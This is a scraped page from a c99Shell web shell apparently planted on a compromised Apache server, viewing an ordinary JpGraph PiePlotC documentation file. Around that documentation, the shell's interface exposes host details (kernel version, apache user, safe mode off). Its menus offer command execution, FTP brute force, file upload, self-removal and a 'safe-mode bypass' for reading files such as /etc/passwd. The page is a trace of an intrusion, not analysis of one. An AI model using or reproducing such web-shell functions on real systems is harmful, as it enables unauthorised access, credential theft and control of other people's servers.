!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/jpgraph/docs/ref/   drwxr-xr-x
Free 52.33 GB of 127.8 GB (40.95%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     PiePlotC.html (13.28 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

CLASS PiePlotC EXTENDS PiePlot
(Defined in: jpgraph_pie.php : 913)
 PiePlotC  PiePlot 
 PiePlotC() 
 SetMid() 
 SetMidColor() 
 SetMidCSIM() 
 SetMidSize() 
 SetMidTitle() 
 Explode() 
 ExplodeAll() 
 ExplodeSlice() 
 PiePlot() 
 SetCenter() 
 SetColor() 
 SetCSIMTargets() 
 SetFont() 
 SetFontColor() 
 SetGuideLines() 
 SetGuideLinesAdjust() 
 SetLabelPos() 
 SetLabels() 
 SetLabelType() 
 SetLegends() 
 SetShadow() 
 SetSize() 
 SetSliceColors() 
 SetStartAngle() 
 SetTheme() 
 SetValueType() 
 ShowBorder() 
 

Class usage and Overview
The PiePlotC is an extesnion of the normal pie plot where there is a filled circle in the center of the pie. This filled circle can have it's own labels and CSIM.

 

See also related classes:
PiePlot

 


Class Methods

 

 

Create a Pie plot with a filled circle in the middle

ArgumentDefaultDescription
$data  Data array
$aCenterTitle '' Title for center circle

Description
Create a variant of the Pie plot with a filled circle in the middle. The title, color and size of the center circle ca be modified. 
 
See also
PiePlotC::SetMidCSIM, PiePlotC::SetMid, PiePlotC::SetMidColor and PiePlotC::SetMidSize

Example

$piec = new PiePlotC($data);

 

 

Specify all parameters for the center circle

ArgumentDefaultDescription
$aTitle  Title text for center circle
$aColor 'white' Fill color for center circle
$aSize 0.5 Size of center. Specified as fraction of radius

Description
Specify all parameters for the center circle 

Example

$piec->SetMid('Halteberg','red:0.6',0.3);

 

 

Specify fill color for center circle

ArgumentDefaultDescription
$aColor  Color

Description
Specify fill color for center circle.  
 
See also
PiePlotC::SetMid

Example

$piec->SetMidColor('yellow:0.6');

 

 

Specify URL target for filled middle circle

ArgumentDefaultDescription
$aTarget  Target URL string
$aAlt  Alt text

Description
Specify URL target for filled middle circle. Use SetCSIMtargets() to specify the individual targets for the slices in the pie.  
 
See also
PiePlot::SetCSIMTargets

Example

$pie->SetMidCSIM('depth.php?t=32','Details');

 

 

Specify size for center circle

ArgumentDefaultDescription
$aSize  Size in fraction of the radius

Description
Specify size for center circle as fraction of the radius. 

Example

$piec->SetMidSize(0.5);

 

 

Specify title for the center circle.

ArgumentDefaultDescription
$aTitle  Title

Description
Specify title for the center circle. The title can also be set in the inital creation of the Pie as well as with the SetMidTitle() 
 
See also
PiePlotC::SetMid and PiePlotC::PiePlotC

Example

$piec->SetMidTitle("Center title\nSecond line title");



:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0054 ]--